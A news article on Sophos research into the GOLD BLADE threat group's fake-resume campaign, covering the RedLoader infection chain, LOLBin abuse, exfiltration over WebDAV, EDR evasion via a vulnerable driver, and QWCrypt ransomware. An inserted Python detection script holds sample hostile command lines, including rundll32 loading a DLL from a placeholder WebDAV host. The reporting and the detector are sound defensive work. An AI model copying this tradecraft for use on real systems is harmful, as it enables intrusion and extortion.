An evolving fake resume scheme conducted by the threat group GOLD BLADE spreads RedLoader malware and QWCrypt ransomware, pilfering data in targeted campaigns, Sophos reported Friday.

The company analyzed 40 attacks between February 2024 and August 2025 suspected to be connected to GOLD BLADE, which is also known as RedCurl, RedWolf and Earth Kapre.

Traditionally, GOLD BLADE has gained initial access through social engineering via fake resumes, cover letters or curricula vitae (CVs), posing as job applicants in emails to hiring managers at targeted companies. However, in recent campaigns, GOLD BLADE has shifted from emails to recruitment sites, uploading lure documents directly to these sites to avoid being flagged by email security systems. Targeted sites include Indeed, JazzHR and ADP WorkforceNow.

The initial lure documents are PDFs that contain links leading to the next stage download. In some cases, the PDFs imitate a Safe Resume Share Service page displaying an error, directing the victim to click a link to view the resume. The next stage download varies between different iterations of the campaign observed between September 2024 and July 2025, consisting of a ZIP archive containing either a .lnk disguised as a resume PDF or an .iso or .img file.
In 2024, the .lnk file would leverage rundll32.exe to retrieve the RedLoader malware dynamic link library (DLL) from an external WebDAV server hosted under a Cloudflare Workers domain and execute it in memory, according to Sophos. In more recent campaigns, the .lnk file would instead retrieve a renamed copy of the legitimate Adobe utility ADNotificationManager.exe from the WebDAV server and use it to sideload the RedLoader DLL for an added layer of stealth.

The .iso/.img files, used in attacks in March and April 2025, also leveraged sideloading via ADNotificationManager.exe, with the .iso/.img being automatically mounted as a virtual drive containing the necessary DLL and executable.

Once the RedLoader DLL is executed, it loads a fake Indeed login page to distract the user and connects to an attacker command-and-control (C2) server in preparation for the next stage of deployment. A scheduled task is created to download and execute the next stage, with earlier attacks using the living-off-the-land (LOTL) binary pcalua.exe (Program Compatibility Assistant) to invoke rundll32.exe and deliver it as a DLL. In more recent attacks, the scheduled task launches both pcalua.exe and conhost.exe (Console Window Host) with a -headless argument to quietly deliver the second-stage payload as an executable in the background.

The second stage connects to a different C2 server and retrieves and executes the final RedLoader payload using another scheduled task.
In September 2024 and March 2025 attacks, this task downloads RedLoader as a DLL along with a .dat file and executes it either by running a rundll32.exe command directly or via pcalua.exe. In April and July 2025, the payload was instead downloaded as an executable, along with its .dat file and a renamed version of 7-Zip, and executed via pcalua.exe.

After full installation, RedLoader connects to another separate C2 server and runs commands to gather information including host details, disks, processes and installed antivirus products, collecting this information into encrypted and password-protected 7-Zip archives to exfiltrate to an attacker-controlled WebDAV server, Sophos wrote.
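As an added defender-side example (not from the Sophos report or this article), the checker below flags three process-creation patterns from the loader chain described above: rundll32.exe loading a DLL from a WebDAV path, a renamed copy of ADNotificationManager.exe used as a sideload host, and pcalua.exe proxying rundll32.exe or a headless conhost.exe. Field names follow Sysmon Event ID 1; the sample events, hostnames and file paths are constructed for illustration.

```python
import ntpath
import re

# Constructed Sysmon Event ID 1-style records (field names as Sysmon reports them); not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\rundll32.exe", "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": r"rundll32.exe \\example-lure.workers.dev@SSL\DavWWWRoot\resume.dll,Start",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Users\jdoe\AppData\Local\Temp\svc.exe", "OriginalFileName": "ADNotificationManager.exe",
     "CommandLine": "svc.exe", "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe", "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": r"rundll32.exe C:\ProgramData\stage.dll,Run",
     "ParentImage": r"C:\Windows\System32\pcalua.exe"},
    {"Image": r"C:\Windows\System32\conhost.exe", "OriginalFileName": "CONHOST.EXE",
     "CommandLine": r"conhost.exe -headless C:\ProgramData\stage2.exe",
     "ParentImage": r"C:\Windows\System32\pcalua.exe"},
    # Two benign events: Adobe's utility under its own name, and conhost.exe spawned normally by cmd.exe.
    {"Image": r"C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe",
     "OriginalFileName": "ADNotificationManager.exe", "CommandLine": "ADNotificationManager.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\conhost.exe", "OriginalFileName": "CONHOST.EXE",
     "CommandLine": "conhost.exe 0x4", "ParentImage": r"C:\Windows\System32\cmd.exe"},
]
# UNC path carrying WebDAV markers (@SSL, DavWWWRoot) or a Cloudflare Workers host.
WEBDAV_RE = re.compile(r"\\\\\S+?(?:@ssl|davwwwroot|\.workers\.dev)", re.I)
HEADLESS_RE = re.compile(r"(?<!\S)--?headless\b", re.I)

def detect(ev):
    """Return the list of rule names a single process-creation event matches."""
    hits = []
    image = ntpath.basename(ev["Image"]).lower()
    parent = ntpath.basename(ev["ParentImage"]).lower()
    orig = ev.get("OriginalFileName", "").lower()
    cmd = ev["CommandLine"]
    # 1. 2024 .lnk stage: rundll32.exe pulling a DLL straight from a WebDAV share.
    if image == "rundll32.exe" and WEBDAV_RE.search(cmd):
        hits.append("rundll32_webdav")
    # 2. Sideload host: PE original name is ADNotificationManager.exe but the file on disk was renamed.
    if orig == "adnotificationmanager.exe" and image != orig:
        hits.append("renamed_adobe_sideload_host")
    # 3. Scheduled-task stages: pcalua.exe proxying rundll32.exe or a headless conhost.exe.
    if parent == "pcalua.exe" and (image == "rundll32.exe"
                                   or (image == "conhost.exe" and HEADLESS_RE.search(cmd))):
        hits.append("pcalua_proxy_execution")
    return hits

def scan(events):
    """Return (index, rule names) for every event that matched at least one rule."""
    return [(i, tags) for i, ev in enumerate(events) if (tags := detect(ev))]
```

Rule 2 relies on Sysmon's OriginalFileName field, which is read from the PE version resource and survives renaming of the file on disk.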
GOLD BLADE leverages the open-source reverse proxy RPivot to facilitate C2 communications and uses a customized version of the Terminator endpoint detection and response (EDR) killer tool to evade defenses. In the recent campaign, a vulnerable Zemana AntiMalware driver was leveraged in conjunction with Terminator to attempt to disable EDR solutions via Bring Your Own Vulnerable Driver (BYOVD) tactics.

QWCrypt ransomware is a custom ransomware used by GOLD BLADE that was deployed to attempt to extort some of the victims affected in RedLoader attacks. In an April attack, the ransomware was delivered in an encrypted 7-Zip archive, with local admin accounts and Impacket remote execution leveraged to run the launcher script that triggered the ransomware deployment, Sophos said.

The ransomware files are tailored to each target, with the file names including a victim-specific ID. Files encrypted by the ransomware are appended with the extension .qwCrypt. The QWCrypt ransom note threatens to leak the encrypted files and provides a Proton Mail email address as a means of contacting the attacker.
Evolving fake resume campaign leads to RedLoader, ransomware infection